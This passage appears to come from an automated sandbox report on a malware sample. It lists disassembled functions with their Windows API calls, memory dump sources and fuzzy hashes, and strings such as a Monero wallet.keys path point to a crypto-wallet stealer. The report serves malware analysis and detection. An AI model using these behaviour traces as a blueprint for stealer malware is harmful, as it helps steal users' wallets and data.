                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C069B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C069C0
                          • ExitProcess.KERNEL32 ref: 00C069DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: 04cfaae6f88d657eb27c72f52aeacfcad16b8d9e3e9ff13e4c999e7077b77d36
                          • Instruction ID: 93b4c2b1167e6fb87307256cbc91454f9f3199074249cb02dfa0bfa0bd0c2163
                          • Opcode Fuzzy Hash: 04cfaae6f88d657eb27c72f52aeacfcad16b8d9e3e9ff13e4c999e7077b77d36
                          • Instruction Fuzzy Hash: 9021EA75D0020CAFCF08EFE4D949AEEBBB5BF48300F04852AE416B3290EB345609CB65
                          Function 00C07E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C07E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C07E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,006DB9D8,00000000,00020119,?), ref: 00C07E5E
                          • RegQueryValueExA.ADVAPI32(?,006ED6D8,00000000,00000000,000000FF,000000FF), ref: 00C07E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00C07E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 41a1419eda772c4951601d7755eb6032b83b8bce3f4bddd7094271bff771f701
                          • Instruction ID: d85c58c1da3df736aef1d4ff4d0875b0e6d999832a6bcfb382ea146bf1e64d53
                          • Opcode Fuzzy Hash: 41a1419eda772c4951601d7755eb6032b83b8bce3f4bddd7094271bff771f701
                          • Instruction Fuzzy Hash: 70118CB1A44209EFD704CB96DC4DFBBBBB8EB04B00F104269F615A72C0D7746844CBA1
                          Function 00C09260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                          Download Yara Rule
                          APIs
                          • StrStrA.SHLWAPI(006ED9A0,?,?,?,00C0140C,?,006ED9A0,00000000), ref: 00C0926C
                          • lstrcpyn.KERNEL32(00E3AB88,006ED9A0,006ED9A0,?,00C0140C,?,006ED9A0), ref: 00C09290
                          • lstrlen.KERNEL32(?,?,00C0140C,?,006ED9A0), ref: 00C092A7
                          • wsprintfA.USER32 ref: 00C092C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          • Opcode ID: df7d62d654151e0f66bd3492fe645978d6e22ae62bc0f15b1e4748c582bfa3db
                          • Instruction ID: 21b3078f5eaefa2db5a18ebbab165314908eb7730e40ab959738ce71e10c3241
                          • Opcode Fuzzy Hash: df7d62d654151e0f66bd3492fe645978d6e22ae62bc0f15b1e4748c582bfa3db
                          • Instruction Fuzzy Hash: CC01087550020CFFCB04DFECC989EAE7BB9EB48350F188158F949AB241C631AA84DB91
                          Function 00BF12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF12B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00BF12BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BF12D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BF12F5
                          • RegCloseKey.ADVAPI32(?), ref: 00BF12FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: af8fed28c1f3815cd86fbaca29d2e8998a2af0d8461a7edc4601b35823d7e043
                          • Instruction ID: fee72a119753923c5a7e30afd2346fe8104cf6c1905cd0e2683d820fe1a120f6
                          • Opcode Fuzzy Hash: af8fed28c1f3815cd86fbaca29d2e8998a2af0d8461a7edc4601b35823d7e043
                          • Instruction Fuzzy Hash: 3E0136B5A4020CBFDB04DFD5DC4DFAEBBB8EB48701F008159FA45A7280D6719A458F51
                          Function 00C0C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 27037096911413673ea4a7b12d95475c7a138f3925195086ca7d72091be36381
                          • Instruction ID: 7dcd3b8aa23f85e9a7280de6e9142c66c69ddf31c8934f5ee4869de7c4522e62
                          • Opcode Fuzzy Hash: 27037096911413673ea4a7b12d95475c7a138f3925195086ca7d72091be36381
                          • Instruction Fuzzy Hash: EE41F5B110079C5EDB218B24CCC4FFBBBE8AF45704F1446E8E99A861C2D2719B45DF24
                          Function 00C06630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C06663
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00C06726
                          • ExitProcess.KERNEL32 ref: 00C06755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          • Opcode ID: 7aa997f02b3685496abb3b313b2ea5d6e4cf345620d3923eb378516a1dc22f9d
                          • Instruction ID: b66fd2ac863cc8dec9ee1f528c6763a89a1b2e172fd027fdffaf4d3beb5591fe
                          • Opcode Fuzzy Hash: 7aa997f02b3685496abb3b313b2ea5d6e4cf345620d3923eb378516a1dc22f9d
                          • Instruction Fuzzy Hash: 0E314BB1901208AEDB14EB90DC86FDEBB78AF54300F404199F24A761D1DF746B88DF66
                          Function 00C087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C10E28,00000000,?), ref: 00C0882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C08836
                          • wsprintfA.USER32 ref: 00C08850
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: cbad93e7dcea75281633c6f1256f3659c2df566fc56969564fa86eacb8e34ded
                          • Instruction ID: 7fcef86dcf2040b934344133c14c80243e6a2eb0d31ccc503f3c7f530b0569a2
                          • Opcode Fuzzy Hash: cbad93e7dcea75281633c6f1256f3659c2df566fc56969564fa86eacb8e34ded
                          • Instruction Fuzzy Hash: 6C212CB1A40208AFDB04DF99DD49FAEBBB8FB48701F144129F645B72C0C779A944CBA1
                          Function 00C08D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00C0951E,00000000), ref: 00C08D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00C08D62
                          • wsprintfW.USER32 ref: 00C08D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          • Opcode ID: 4ae990940de53b487a468bf31e24139e69fe2d42d2722cba4f6a464939a5efaa
                          • Instruction ID: 1f51e19e2fefa11b252a70a3315bda176cf49cbb5d5c763767e40251c33fb079
                          • Opcode Fuzzy Hash: 4ae990940de53b487a468bf31e24139e69fe2d42d2722cba4f6a464939a5efaa
                          • Instruction Fuzzy Hash: F0E08670A4020CFFD704DB95DC0EE597BB8EB04701F040064FD4997280D9715E449B52
                          Function 00BFA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFA2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 00BFA3FF
                          • lstrlen.KERNEL32(00000000), ref: 00BFA6BC
                            • Part of subcall function 00C0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C0A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFA743
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 09828a3a0f5aa04ec11856aa725ed5508283c436fe8a396d15afff191ff55824
                          • Instruction ID: c052da26fa53af618c21224f1750a5059731ff1fdd5542f2d04132793114876f
                          • Opcode Fuzzy Hash: 09828a3a0f5aa04ec11856aa725ed5508283c436fe8a396d15afff191ff55824
                          • Instruction Fuzzy Hash: 4AE1EE729102089BDB05FBA4DD96EEE7338AF24300F548269F517720D1EF346A4DEB62
                          Function 00BFD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                            • Part of subcall function 00C08B60: GetSystemTime.KERNEL32(00C10E1A,006E9B18,00C105AE,?,?,00BF13F9,?,0000001A,00C10E1A,00000000,?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C08B86
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BFD481
                          • lstrlen.KERNEL32(00000000), ref: 00BFD698
                          • lstrlen.KERNEL32(00000000), ref: 00BFD6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 00BFD72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
